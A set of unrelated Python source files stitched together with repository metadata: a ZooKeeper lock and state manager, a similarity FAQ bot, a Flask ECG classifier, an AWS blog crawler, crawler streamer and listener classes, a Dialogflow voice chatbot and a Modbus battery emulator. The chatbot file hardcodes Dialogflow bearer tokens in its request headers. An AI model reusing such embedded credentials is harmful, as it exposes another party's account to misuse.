self._dcs_state = state
self.logger.warn('zookeeper connection state: {}'.format(state))
if state != KazooState.CONNECTED:
self._loop.call_soon_threadsafe(self._loop.create_task, self._check_state())
if state == KazooState.LOST:
self._loop.call_soon_threadsafe(self.app.restart, 0)
async def _check_state(self):
for i in range(20):
await sleep(1)
if self._dcs_state == KazooState.CONNECTED:
return
# we could not re-connect within 4 seconds,
# so we assume all is lost and we should restart
self._loop.call_soon(self.app.restart, 0)
@subscribe
def dcs_set_database_identifier(self, database_id):
return self._retry('dcs_set_database_identifier', self._group_name, database_id)
@subscribe
def dcs_get_database_identifier(self):
return self._retry('dcs_get_database_identifier', self._group_name)
@subscribe
def dcs_set_timeline(self, timeline):
return self._retry('dcs_set_timeline', self._group_name, timeline)
@subscribe
def dcs_get_timeline(self):
return self._retry('dcs_get_timeline', self._group_name)
def _only_my_cluster_filter(self, callback):
def f(value):
callback(value.get(self._group_name, {}))
return f
@subscribe
def dcs_watch(self, master_lock, state, conn_info):
if master_lock is not None:
self._storage.dcs_watch_lock('master', self._group_name, master_lock)
if state is not None:
self._storage.dcs_watch_state(
self._only_my_cluster_filter(state),
self._group_name)
if conn_info is not None:
self._storage.dcs_watch_conn_info(
self._only_my_cluster_filter(conn_info),
self._group_name)
@subscribe
def dcs_get_lock_owner(self, name):
return self._retry('dcs_get_lock_owner', self._group_name, name)
@subscribe
def dcs_lock(self, name):
result = self._retry('dcs_lock',
self._group_name,
name,
self.app.my_id)
if result in ('locked', 'owned'):
return True
elif result == 'broken':
self._log_takeover('lock/{}/{}'.format(self._group_name, self.app.my_id))
return True
elif result == 'failed':
return False
raise AssertionError(result)
@subscribe
def dcs_unlock(self, name):
self._retry('dcs_unlock', self._group_name, name, self.app.my_id)
def _log_takeover(self, path):
if self._takeovers.get(path, False):
# hmm, I have taken over before, this is NOT good
# maybe 2 of me are running
self.logger.error('Taking over again: {}\n'
'This should not happen, check that you do not '
'have 2 nodes with the same id running'.format(path))
else:
# first time I am taking over, probably normal operation after a restart
self.logger.info('Taking over {}'.format(path))
self._takeovers[path] = True
@subscribe
def dcs_set_conn_info(self, conn_info):
how = self._retry('dcs_set_conn_info', self._group_name, self.app.my_id, conn_info)
if how == 'takeover':
self._log_takeover('conn/{}/{}'.format(self._group_name, self.app.my_id))
@subscribe
def dcs_set_state(self, state):
how = self._retry('dcs_set_state', self._group_name, self.app.my_id, state)
if how == 'takeover':
self._log_takeover('state/{}/{}'.format(self._group_name, self.app.my_id))
@subscribe
def dcs_list_conn_info(self):
return self._retry('dcs_list_conn_info', group=self._group_name)
@subscribe
def dcs_list_state(self):
return self._retry('dcs_list_state', group=self._group_name)
@subscribe
def dcs_delete_conn_info(self):
self._retry('dcs_delete_conn_info',
self._group_name,
self.app.my_id)
@subscribe
def dcs_disconnect(self):
self._storage.connection.remove_listener(self._session_state_handler)
self._storage.dcs_disconnect()
class ZookeeperStorage:
"""A low level storage object.
Manages and publishes the zookeeper connection.
Manages the database "schema" and allows access to multiple "groups"
database servers, each representing one logical cluster.
"""
_zk = None
def __init__(self, connection_string, path, timeout=10.0):
self._connection_string = connection_string
self._path_prefix = path
self._timeout = timeout
if not self._path_prefix.endswith('/'):
self._path_prefix += '/'
self._watchers = {}
self._loop = asyncio.get_event_loop()
@property
def connection(self):
if self._zk is None:
self._zk = KazooClient(
hosts=self._connection_string,
timeout=self._timeout)
return self._zk
def dcs_connect(self):
self.connection.start()
def dcs_disconnect(self):
self._zk.stop()
self._zk = None
def _dict_watcher(self, group, what, callback):
def hook(state, key, from_val, to_val):
callback(_get_clusters(state))
path = self._folder_path(what)
prefix = group and group + '-' or group
try:
watch = DictWatch(self._zk, path, hook, prefix=prefix)
except kazoo.exceptions.NoNodeError:
self._zk.create(path, makepath=True)
return self._dict_watcher(group, what, callback)
self._watchers[id(watch)] = watch
return watch
def _listen_connection(self, state):
self._connection_state_changes.append(state)
self._loop.call_soon_threadsafe(self._consume_connection_state_changes)
def dcs_watch_conn_info(self, callback, group=None):
self._dict_watcher(group, 'conn', callback)
def dcs_watch_state(self, callback, group=None):
self._dict_watcher(group, 'state', callback)
def _folder_path(self, folder):
return self._path_prefix + folder
def _path(self, group, folder, key):
return self._path_prefix + folder + '/' + group + '-' + key
def _get_static(self, group, key):
path = self._path(group, 'static', key)
try:
data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
return None
return data
def _set_static(self, group, key, data, overwrite=False):
path = self._path(group, 'static', key)
try:
self._zk.create(path, data, makepath=True)
except kazoo.exceptions.NodeExistsError:
if overwrite:
self._zk.set(path, data)
return True
return False
return True
def dcs_get_timeline(self, group):
data = self._get_static(group, 'timeline')
if data is None:
data = b'0'
return int(data.decode('ascii'))
def dcs_set_timeline(self, group, timeline):
assert isinstance(timeline, int)
existing = self.dcs_get_timeline(group)
if existing > timeline:
raise ValueError('Timelines can only increase.')
timeline = str(timeline).encode('ascii')
self._set_static(group, 'timeline', timeline, overwrite=True)
def dcs_set_database_identifier(self, group, database_id):
database_id = database_id.encode('ascii')
return self._set_static(group, 'database_identifier', database_id)
def dcs_get_database_identifier(self, group):
data = self._get_static(group, 'database_identifier')
if data is not None:
data = data.decode('ascii')
return data
def dcs_get_lock_owner(self, group, name):
path = self._path(group, 'lock', name)
try:
existing_data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
return None
return existing_data.decode('utf-8')
def dcs_unlock(self, group, name, owner):
existing_owner = self.dcs_get_lock_owner(group, name)
if existing_owner == owner:
path = self._path(group, 'lock', name)
self._zk.delete(path)
def dcs_lock(self, group, name, owner):
data = owner.encode('utf-8')
path = self._path(group, 'lock', name)
try:
self._zk.create(path, data, ephemeral=True, makepath=True)
return 'locked'
except kazoo.exceptions.NodeExistsError:
pass
# lock exists, do we have it, can we break it?
try:
existing_data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
# lock broke while we were looking at it
# try get it again
return self.dcs_lock(group, name, owner)
if stat.owner_session_id == self._zk.client_id[0]:
# we already own the lock
return 'owned'
elif data == existing_data:
# it is our log, perhaps I am restarting. of there are 2 of me running!
try:
self._zk.delete(path, version=stat.version)
except (kazoo.exceptions.NoNodeError, kazoo.exceptions.BadVersionError):
# lock broke while we were looking at it
pass
# try get the lock again
result = self.dcs_lock(group, name, owner)
if result == 'locked':
return 'broken'
return result
return 'failed'
def dcs_watch_lock(self, name, group, callback):
loop = asyncio.get_event_loop()
def handler(data, stat, event):
if data is not None:
data = data.decode('utf-8')
callback(data)
path = self._path(group, 'lock', name)
w = self._zk.DataWatch(path, partial(loop.call_soon_threadsafe, handler))
self._watchers[id(w)] = w
def dcs_get_database_identifiers(self):
wanted_info_name = 'database_identifier'
dirpath = self._folder_path('static')
try:
children = self._zk.get_children(dirpath)
except kazoo.exceptions.NoNodeError:
return {}
result = {}
for name in children:
owner, info_name = name.split('-', 1)
if wanted_info_name != info_name:
continue
try:
data, state = self._zk.get(dirpath + '/' + name)
except kazoo.exceptions.NoNodeError:
continue
state = json.loads(data.decode('ascii'))
result[owner] = state
return result
def dcs_watch_database_identifiers(self, callback):
name = 'database_identifier'
def handler(state, key, from_val, to_val):
# this is probably more complex than it needs to be!
c_state = _get_clusters(state)
new_state = {}
for k, v in c_state.items():
ours = v.get(name, None)
if ours is not None:
new_state[k] = ours
callback(new_state)
dirpath = self._folder_path('static')
watch = DictWatch(
self._zk,
dirpath,
handler,
deserializer=lambda data: data.decode('utf-8'))
self._watchers[id(watch)] = watch
def dcs_watch_locks(self, name, callback):
def handler(state, key, from_val, to_val):
# this is probably more complex than it needs to be!
c_state = _get_clusters(state)
new_state = {}
for k, v in c_state.items():
ours = v.get(name, None)
if ours is not None:
new_state[k] = ours
callback(new_state)
dirpath = self._folder_path('lock')
watch = DictWatch(
self._zk,
dirpath,
handler,
deserializer=lambda data: data.decode('utf-8'))
self._watchers[id(watch)] = watch
def _set_info(self, group, type, owner, data):
path = self._path(group, type, owner)
data = json.dumps(data)
data = data.encode('ascii')
try:
stat = self._zk.set(path, data)
how = 'existing'
except kazoo.exceptions.NoNodeError:
how = 'create'
stat = None
if stat is not None and stat.owner_session_id != self._zk.client_id[0]:
self._zk.delete(path)
how = 'takeover'
stat = None
if stat is None:
self._zk.create(path, data, ephemeral=True, makepath=True)
return how
def dcs_set_conn_info(self, group, owner, data):
return self._set_info(group, 'conn', owner, data)
def dcs_set_state(self, group, owner, data):
return self._set_info(group, 'state', owner, data)
def _get_all_info(self, group, type):
dirpath = self._folder_path(type)
try:
children = self._zk.get_children(dirpath)
except kazoo.exceptions.NoNodeError:
return iter([])
for name in children:
this_group, owner = name.split('-', 1)
if group is not None and this_group != group:
continue
data, state = self._zk.get(dirpath + '/' + name)
state = json.loads(data.decode('ascii'))
yield owner, state
def dcs_list_conn_info(self, group=None):
return list(self._get_all_info(group, 'conn'))
def dcs_list_state(self, group=None):
return list(self._get_all_info(group, 'state'))
def dcs_delete_conn_info(self, group, owner):
path = self._path(group, 'conn', owner)
try:
self._zk.delete(path)
except kazoo.exceptions.NoNodeError:
pass
``` |
{
"source": "JinuAugustine98/SoliBot",
"score": 3
} |
#### File: JinuAugustine98/SoliBot/similarity.py
```python
import re, math
from collections import Counter
from corpus import CORPUS
from corpus import DAIRY_CORPUS
from corpus import COTTON_CORPUS
from corpus import CASTOR_CORPUS
from corpus import AQUACULTURE_CORPUS
from corpus import FRUITS_CORPUS
from corpus import SUGARCANE_CORPUS
from corpus import TEA_CORPUS
from corpus import LEATHER_CORPUS
from corpus import PALM_CORPUS
WORD = re.compile(r'\w+')
def get_cosine(vec1, vec2):
intersection = set(vec1.keys()) & set(vec2.keys())
numerator = sum([vec1[x] * vec2[x] for x in intersection])
sum1 = sum([vec1[x]**2 for x in vec1.keys()])
sum2 = sum([vec2[x]**2 for x in vec2.keys()])
denominator = math.sqrt(sum1) * math.sqrt(sum2)
if not denominator:
return 0.0
else:
return float(numerator) / denominator
def text_to_vector(text):
words = WORD.findall(text)
return Counter(words)
def compare_similarity(word_one, word_two):
vector1 = text_to_vector(word_one.lower())
vector2 = text_to_vector(word_two.lower())
return get_cosine(vector1, vector2)
def find_most_similar(cate, word):
max = {"answer": None, "score": 0, "question": None, "image": None, "video": None}
if cate == "General":
DATA = CORPUS
elif cate == "Dairy":
DATA = DAIRY_CORPUS
elif cate == "Cotton":
DATA = COTTON_CORPUS
elif cate == "Castor":
DATA = CASTOR_CORPUS
elif cate == "Aquaculture":
DATA = AQUACULTURE_CORPUS
elif cate == "Fruits":
DATA = FRUITS_CORPUS
elif cate == "Sugarcane":
DATA = SUGARCANE_CORPUS
elif cate == "Tea":
DATA = TEA_CORPUS
elif cate == "Leather":
DATA = LEATHER_CORPUS
elif cate == "Palm":
DATA = PALM_CORPUS
else:
DATA = CORPUS
try:
for each in DATA:
score = compare_similarity(word, each['Question'])
if score > max['score']:
max['score'] = score
max['answer'] = each['Answer']
max['question'] = each['Question']
max['image'] = each['image_path']
max['video'] = each['a_link']
return {"score": max['score'], "answer": max['answer'], "question": max['question'], "image": max['image'], "video": max['video']}
except:
return {"score": 0.00, "answer": 'None', "question": 'None', "image": 'None', "video": 'None'}
``` |
{
"source": "jinujayan/Capstone_ECGAnalyzer",
"score": 2
} |
#### File: Capstone_ECGAnalyzer/app/app.py
```python
import os
import urllib.request
import pandas as pd
import numpy as np
from flask import Flask, flash, request, redirect, render_template
from werkzeug.utils import secure_filename
import json
import plotly
import plotly.figure_factory as ff
import plotly.offline as py
import plotly.graph_objs as go
import configparser
#import cufflinks as cf
#cf.go_offline()
import keras
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv1D, MaxPooling1D, GlobalAveragePooling1D
from keras.optimizers import SGD
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
import argparse
from keras import backend as K
#STATIC_DIR = os.path.abspath('../ECG_Analysis/app/static')
app = Flask(__name__,static_url_path='/static')
app.secret_key = os.urandom(24)
ALLOWED_EXTENSIONS = set(['csv', 'xlsx','xls'])
#print(os.getcwd())
def get_default_config():
conf = configparser.ConfigParser()
conf.read('../conf/config.ini')
config = conf['DEFAULT']
return config
conf = get_default_config()
deploy_type = conf['deploy_type']
print(deploy_type)
hostname = conf['hostname']
port = conf['port']
@app.route('/')
def upload_form():
"""
Method implementing the home url, it calls the index.html to render a home page view
@param
@return: Rendered html view
"""
return render_template('index.html',hostname=hostname, port=port)
def allowed_file(filename):
"""
Check if the input file is with the correct extension.
@param file - Input analysis file / demo string
@return: Boolean after checking the file extension
"""
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/uploader', methods=['GET','POST'])
def uploader():
if request.method == 'POST':
# check if the post request has the file part
test_flag = ''
if 'file' in request.files:
test_flag = 'file'
else:
test_flag = 'demo'
demo_data = request.form['samplevalue']
if test_flag == 'demo' :
demo_data = demo_data.split(',')
demo_data = [ float(val) for val in demo_data]
out_df, graphJSON = predictionHandler(demo_data = demo_data)
#print("Show the shape of output DF")
#print(out_df.shape)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
file = request.files['file']
if file.filename == '':
flash('No file selected for uploading')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(filename)
flash('File successfully uploaded...call the handler now..')
extension = file.filename.split('.')[1]
plot_index = request.form['plot_sample']
out_df, graphJSON = predictionHandler(file.filename,extension,plot_index= plot_index)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
flash('Allowed file types are csv,xls,xlsx')
return redirect(request.url)
def predictionHandler(test_file=False,extension='', plot_index=1, demo_data=[]):
"""
Method to call the inference on the model and to create the graph objects
@param test_fileile - Input analysis file
@param plot_index - The index of the data file to be plotted
@param demo_data - The demo data string
@return - Valid dataframe, graph json object
"""
plot_index = int(plot_index)
if test_file:
if extension == "csv":
df = pd.read_csv(test_file)
elif (extension == "xls" or extension == "xlsx"):
df = pd.read_excel(test_file)
else:
raise ValueError('Input file with unexpected extension, please use csv, xlsx,xls files')
test_rec = df.values
test_rec = test_rec.reshape(test_rec.shape[0], test_rec.shape[1],1)
else:
test_rec = np.array(demo_data)
test_rec = test_rec.reshape(1, test_rec.shape[0],1)
df_data = np.array(demo_data)
df_data = df_data.reshape(1,df_data.shape[0])
df = pd.DataFrame(data=df_data)
model_ECG_loaded = load_model('../models/model_ECG_final.h5')
model_MI_loaded = load_model('../models/model_MI_final.h5')
print("models loaded...")
out_classes = model_ECG_loaded.predict(test_rec)
print("prediction completed..")
ECG_class = np.argmax(out_classes,axis=1)
out_classes = model_MI_loaded.predict(test_rec)
MI_class = np.argmax(out_classes,axis=1)
out_df = pd.DataFrame(columns =['ECG_Class', 'MI_Class'], data = np.array([ECG_class, MI_class]).transpose())
out_df['User_id'] = out_df.index+1
out_df = out_df[['User_id', 'ECG_Class','MI_Class']]
ecg_clas_mapper = {0:'N', 1:'S', 2:'V', 3:'F',4:'Q'}
MI_class_mapper = {0:'Normal', 1:'Abnormal'}
out_df.ECG_Class = out_df.ECG_Class.map(ecg_clas_mapper)
out_df.MI_Class = out_df.MI_Class.map(MI_class_mapper)
ecg_class = out_df.iloc[plot_index-1].ECG_Class
mi_class = out_df.iloc[plot_index-1].MI_Class
if mi_class == 0:
mi_class = 'Normal'
else:
mi_class = 'Abnormality'
graphs = createECGGraph(df,plot_index,ecg_class,mi_class)
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
return out_df,graphJSON
def createECGGraph(df, plot_index, ecg_class, mi_class):
"""
Method to create the line plot graph object
@param df - The intermediate dataframe with predicted classes
@param plot_index - The index of the data file to be plotted
@param ecg_class - The ecg calss identified for the index being plotted
@param mi_class - The Myocardial Infraction calss identified for the index being plotted
@return: Valid plotly graph object
"""
df_index = plot_index-1
xvals = list(range(0, df.iloc[df_index].count()))
yvals = list(df.iloc[df_index].values)
graphs = [
{
'data': [
{
"x": xvals,
"y":yvals,
"type": "scatter"
}
],
'layout': {
'title': f"ECG Readings for the record# {plot_index}, ECG class = {ecg_class} <br> MI tests shows {mi_class}",
'yaxis': {
'title': "ECG Readings"
},
'xaxis': {
'title': "Time instance"
}
}
}
]
return graphs
if __name__ == "__main__":
app.run(host='0.0.0.0', port=port,threaded=False)
``` |
{
"source": "jinuland/aws-blog-crawler",
"score": 3
} |
#### File: aws-blog-crawler/scripts/aws-crawler-ko.py
```python
import requests
from bs4 import BeautifulSoup
from elasticsearch import Elasticsearch
from datetime import datetime
import time
import yaml
import argparse
import json
seedURL = 'https://aws.amazon.com/ko/blogs/korea'
with open('./conf.yaml', 'r') as f:
config = yaml.load(f)
es = Elasticsearch( [config['amazon_es_host']],
http_auth=(config['user_id'], config['password']),
scheme="https",
port=443
)
indexName = config['index']
file = config['archive_file_name_ko']
f = open(file, 'w')
def parse(url, doArchive):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
articles = soup.find_all('article')
for article in articles:
title = article.find('h2').get_text()
print('title is : ' + title)
url = article.find('h2').find('a')['href']
print("url is : " + url)
author = article.find('footer').find('span', {"property" : "author"}).get_text()
print('author : ' + author)
postingTime = article.find('footer').find('time').get_text()
isoPostingTime = datetime.strptime(postingTime, '%d %b %Y').isoformat()
print('time : ' + isoPostingTime)
category = ''
categoryList = []
try :
category_spans = article.find('footer').find('span', {"class", "blog-post-categories"}).find_all('a')
print(len(category_spans))
categoryList = list(map(lambda x : "'" + x.find('span').get_text() + "'", category_spans))
print(categoryList)
category = ','.join(categoryList)
print('category : ' + category)
except(AttributeError) as e :
pass
body = article.find('section').get_text()
print('body : ' + body)
doc = {
'title': title,
'author': author,
'date': isoPostingTime,
'category': categoryList,
'body': body,
'url' : url
# TODO: write code...
}
index = {
"index" : {
"_index" : indexName,
"_id" : doc['title']
}
}
print(doc)
if doArchive :
f.write(json.dumps(index) + "\n")
f.write(json.dumps(doc) + "\n")
else :
res = es.index(index='aws-blog', body=doc, id=title)
print(res)
parser = argparse.ArgumentParser()
parser.add_argument("--archive", help="archive blog data to file", action="store_true")
args = parser.parse_args()
pageMax = 200
for pageNum in range(1,pageMax):
if pageNum < 2 :
parse(seedURL, args.archive)
else :
parse(seedURL + '/page/' + str(pageNum), args.archive)
time.sleep(0.1)
f.close()
``` |
{
"source": "jinulee-v/koshort",
"score": 3
} |
#### File: koshort/birdman/error.py
```python
class ParserUpdateRequiredError(Exception):
def __init__(self, name, msg):
super(ParserUpdateRequiredError, self).__init__("%s | %s"%(name, msg))
class UnknownError(Exception):
def __init__(self, name):
super(UnknownError, self).__init__("%s | %s"%(name, "Unknown error. Generate issues in our Github repository for support."))
```
#### File: birdman/listen/base.py
```python
from abc import ABCMeta, abstractmethod
class BaseListener(object):
"""BaseListener class contains:
Methods:
listen : listens and reacts to the dictionary it is provided.
Since streamers provide dict with its own unique set of keys,
Listeners should be aware of such different formats.
"""
__metaclass__ = ABCMeta
def __init__(self, obj):
"""
Args:
listen_to: Iterable[str]. List of Streamer.config.name to listen.
For default, listen on everything.
"""
self.listen_to = obj.get('listen_to', None)
@abstractmethod
def listen(self, result):
'''Must override.
Listens to the result object(dict) and process it however you like.
'''
pass
@abstractmethod
async def close(self):
'''Must override.
How to properly close this listener?
'''
pass
```
#### File: birdman/listen/text.py
```python
from birdman.listen import register_listener
from birdman.listen.base import BaseListener
@register_listener('text')
class TextListener(BaseListener):
"""TextListener records the result dict in given format to the desired file.
formatstr decides your desired text format.
It is directly fed to built-in format() function, so check "python format() named placeholder syntax" for good.
"""
def __init__(self, obj):
"""
Args:
file, encoding, bufsize: Equal to python built-in `open()`
keys: Iterable(str).
If not None, only keys from this variable will be stored.
"""
super(TextListener, self).__init__(obj)
file = obj.get('file', 'test.log')
encoding = obj.get('encoding', 'UTF-8')
buffering = obj.get('buffering', 1)
self.file = open(file, mode='a', encoding=encoding, buffering=buffering)
self.must_have_keys = obj.get('must_have_keys', ['url', 'nickname', 'wirtten_at'])
self.formatstr = obj.get('formatstr', "{url}\t{nickname}\t{written_at}")
def listen(self, result):
for key in self.must_have_keys:
if key not in result:
result[key] = ''
result_str = self.formatstr.format(**result)
self.file.write(
result_str + '\n'
)
def close(self):
self.file.close()
```
#### File: birdman/stream/base.py
```python
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import urllib3
import logging
from abc import ABCMeta, abstractmethod
class BirdmanStreamerError(Exception):
def __init__(self, message, streamer):
self.message = message
self.streamer = streamer
def __str__(self):
return "%s has crashed. \n%s" % (self.streamer, self.message)
class BaseStreamerConfig(object):
"""Config object for BaseStreamer.
"""
def __init__(self, obj):
"""
Args:
obj (dict): result of YAML parsing.
"""
self.verbose = bool(obj.get('verbose', 0))
class BaseStreamer(object):
"""BaseStreamer class contains:
Methods:
get_parser: returns initial argument parser
show_options: show options that can be used or parsed
set_logger: set logger configurations
stream: try asynchronous streaming using job method
"""
__metaclass__ = ABCMeta
def __init__(self, config_obj):
self.config = BaseStreamerConfig(config_obj)
def show_config(self):
"""Print out config available and predefined values."""
string = 'Configuration for <%s>\n' % (self.config.name)
for attr, value in sorted(vars(self.config).items()):
string += " {} = {}\n".format(attr, value)
self.logger.info(string)
def set_logger(self, stream=None, filename=None):
# logger
self.logger = logging.getLogger('asyncio.koshort.stream.' + self.config.name)
if self.config.verbose:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.WARNING)
# Formatter
formatter = logging.Formatter('[%(levelname)s] ' + self.config.name
+ ' %(asctime)s | %(message)s\n')
# Handler
handler = logging.StreamHandler(stream)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if filename is not None:
if isinstance(filename, str):
filename = [filename]
for file in filename:
handler = logging.FileHandler(file, mode='a', encoding='UTF-8')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
async def stream(self):
if self.config.verbose:
self.show_config()
try:
async for result in self.job():
yield self.config.name, result
except urllib3.exceptions.ProtocolError:
self.logger.warning("ProtocolError has raised but continue to stream.")
self.stream()
except RecursionError:
self.logger.error("RecursionError; too much retries")
return
@abstractmethod
async def job(self):
'''Must override as a generator(i.e. yield not return).
Generate one result at a time.
'''
pass
@abstractmethod
async def close(self):
'''Must override.
How to properly close this streamer?
'''
pass
```
#### File: examples/cyber_patrol_assistant/main.py
```python
from birdman import init_birdman_from_yaml
from birdman.listen import register_listener
from birdman.listen.text import TextListener
@register_listener('title_body')
class TitleBodyListener(TextListener):
"""TitleBodyListener records the result dict in given format to the desired file.
formatstr decides your desired text format.
It is directly fed to built-in format() function, so check "python format() named placeholder syntax" for good.
"""
def __init__(self, obj):
"""
Args:
file, encoding, bufsize: Equal to python built-in `open()`
keys: Iterable(str).
If not None, only keys from this variable will be stored.
"""
super(TitleBodyListener, self).__init__(obj)
self.must_have_keys = ['title', 'body']
self.formatstr = obj.get('formatstr', "{title}▁{body}")
def listen(self, result):
result['body'] = result['body'].replace('\n', ' ')
super(TitleBodyListener, self).listen(result)
def main():
riggan = init_birdman_from_yaml('examples/cyber_patrol_assistant/config.yaml', 'auth.yaml')
riggan.start()
if __name__ == "__main__":
main()
``` |
{
"source": "jinuoh2003/TrafficLightML",
"score": 2
} |
#### File: jinuoh2003/TrafficLightML/chatbot.py
```python
import argparse
import locale
import logging
from aiy.board import Board, Led
from aiy.cloudspeech import CloudSpeechClient
from google.cloud import texttospeech
from pygame import mixer
import time
import requests
import os
import json
from flask import Flask, request, jsonify,redirect
#databse mysql
import pymysql.cursors
#Configure db
conn = pymysql.connect(host='127.0.0.1',user='pi',password='<PASSWORD>',charset='utf8mb4')
client = texttospeech.TextToSpeechClient()
def get_answer(text, user_key):
print("get_answer... start")
data_send = {
'query': text,
'sessionId': user_key,
'lang': 'en',
}
data_header = {
'Authorization': 'Bearer 4e7da793a9ce4a57b2cd113bd2a7ebf2',
#'Authorization': 'Bearer 56b4c79017514fb6a27a45ce43bc21a3', ## jjangphal
'Content-Type': 'application/json; charset=utf-8'
}
dialogflow_url = 'https://api.dialogflow.com/v1/query?v=20150910'
res = requests.post(dialogflow_url, data=json.dumps(data_send), headers=data_header)
if res.status_code != requests.codes.ok:
return '오류가 발생했습니다.'
data_receive = res.json()
print (json.dumps(data_receive,indent=4))
answer = data_receive['result']['fulfillment']['speech']
parameters = data_receive['result']['parameters']
if parameters :
city = data_receive['result']['parameters']['local-city']
print("local-city:" + city)
return answer
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
@app.route('/', methods=['POST', 'GET'])
def webhook():
content = request.args.get('content')
userid = request.args.get('userid')
return get_answer(content, userid)
def tts_answer(answer):
# Set the text input to be synthesize
synthesis_input = texttospeech.types.SynthesisInput(text = answer)
count = len(str(synthesis_input))/18 ### english 18
print ("count" + str(count))
voice = texttospeech.types.VoiceSelectionParams(
language_code='en-US',
ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)
# Select the type of audio file you want returned
audio_config = texttospeech.types.AudioConfig(audio_encoding=texttospeech.enums.AudioEncoding.MP3)
# Perform the text-to-speech request on the text input with the selected
# voice parameters and audio file type
response = client.synthesize_speech(synthesis_input, voice, audio_config)
# The response's audio_content is binary.
with open('output.mp3', 'wb') as out:
# Write the response to the output file.
out.write(response.audio_content)
print('Audio content written to file "output.mp3"')
#os.system("omxplayer -o alsa output.mp3")
mixer.init()
mixer.music.load('output.mp3')
mixer.music.play(0)
time.sleep(count)
print ("SOUND GOOD~~")
def get_hints(language_code):
if language_code.startswith('en_'):
return ('turn on the light',
'turn off the light',
'blink the light',
'goodbye')
return None
def locale_language():
language, _ = locale.getdefaultlocale()
language = 'en_US'
print("start:" +language)
return language
def main():
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description='Assistant service example.')
parser.add_argument('--language', default=locale_language())
args = parser.parse_args()
logging.info('Initializing for language %s...', args.language)
hints = get_hints(args.language)
client = CloudSpeechClient()
tts_answer("Now, Tell me please.")
with Board() as board:
while True:
text = client.recognize(language_code=args.language,
hint_phrases=hints)
if text is None:
tts_answer('Sorry, I did not hear you.')
print('Sorry, I did not hear you.')
else :
print("I: "+ text)
if "good bye" in text or "bye" in text or 'by' in text :
print("Thank you. Bye~")
tts_answer('Thank you. Goodbye.')
break
# save db (I text)
try:
with conn.cursor() as cursor:
sql = 'INSERT INTO aiy.chat(content) VALUES(%s)'
cursor.execute(sql,("I: "+text))
conn.commit()
print("save:{}".format(cursor.lastrowid))
except:
print("DB1 에러")
#### print answer
answer = get_answer(text,'jp')
print('Chatbot: "', answer, '"')
#### save db (chatbot text)
try:
with conn.cursor() as cursor:
sql = 'INSERT INTO aiy.chat(content) VALUES(%s)'
cursor.execute(sql,("Chatbot: "+answer))
conn.commit()
except:
print("DB1 error")
tts_answer(answer)
if __name__ == '__main__':
main()
``` |
{
"source": "jinupygogo/apis-dcdc_batt_comm",
"score": 2
} |
#### File: drivers/battery_emulator/__init__.py
```python
import time
import pymodbus
from essx.essx_exception import ESSXDeviceException
# RSOC等を取りにいく間隔。この時間経過しないとmodbusコマンドを発行しない
# 0にすると必ず発行する
T = 0
class BatteryEmulator(object):
def __init__(self, dev = None, modbus_adr_rsoc = None, modbus_adr_status = None, unit = 0x1):
"""
:param pymodbus.client.sync.ModbusSerialCliet dev: デバイス
:param int modbus_adr_rsoc: RSOCのアドレス
:param int modbus_adr_status: STATUSのアドレス
:param int unit: UNIT
"""
self.dev = dev #
self.modbus_adr_rsoc = modbus_adr_rsoc
self.modbus_adr_status = modbus_adr_status
self.unit = unit
self._rsoc = 0.0
self._status = 1
self._rsoc_ts = 0
self._status_ts = 0
def read_rsoc(self):
"""
rsocを取得する
:return RSOC: 0 - 100.0
:rtype float:
事前に remote_rsocが実行されている必要がある
"""
return self._rsoc / 10.0
def read_status(self):
"""
statusを取得する
:return 融通可 1 / 融通不可 0
:rtype int:
要求仕様書では modbusの該当レジスタが0のときに融通可, 1のときに不可と
意味合いが逆であることに注意。
事前に read_statusが実行されている必要がある
"""
return 0 if (self._status & 0x1) == 1 else 1
def remote_rsoc_and_status(self):
""" rsocと statusのアドレスが隣りあってるときは一回で取得する """
if self._rsoc_ts > time.time() - T and self._status_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_rsoc, 2, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._rsoc = rr.getRegister(0)
self._status = rr.getRegister(1)
self._rsoc_ts = time.time()
self._status_ts = time.time()
def remote_rsoc(self):
""" rsocを取得するコマンドを発行する """
if self.modbus_adr_status - self.modbus_adr_rsoc == 1:
self.remote_rsoc_and_status()
return
if self._rsoc_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_rsoc, 1, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._rsoc = rr.getRegister(0)
self._rsoc_ts = time.time()
def remote_status(self):
""" statusを取得するコマンドを発行する """
if self._status_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_status, 1, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._status = rr.getRegister(0)
self._status_ts = time.time()
def check_battery(self):
"""
:return: (rsoc, bos, commerr)からなるタプル
:rtype tuple:
rsocは 0.0から 100.0までの float
